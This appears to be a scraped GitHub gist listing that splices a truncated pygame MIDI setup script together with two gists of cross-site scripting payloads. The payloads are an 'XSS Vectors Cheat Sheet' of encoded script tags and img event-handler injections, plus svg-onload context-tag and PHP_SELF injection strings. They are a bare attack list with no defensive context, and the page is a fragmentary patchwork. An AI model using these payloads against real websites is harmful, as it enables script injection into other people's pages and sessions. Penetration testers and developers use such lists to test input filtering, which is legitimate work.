Skip to content

Instantly share code, notes, and snippets.

import sys, pygame, pygame.midi
import time
# set up pygame
M_NOTE_ON = 144
M_NOTE_OFF = 128
M_RIBBON_ON = 100
pygame.init()
pygame.midi.init()
# list all midi devices
@omriman067
omriman067 / xss_vectors.txt
Created December 27, 2020 21:52 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@omriman067
omriman067 / b.txt
Last active December 29, 2020 20:27
b.txt
Context Tag Injection, </script><svg onload=console.log(1)>. PHP_SELF Injection, http://DOMAIN/PAGE.php/"><svg onload=console.log(1)>. ""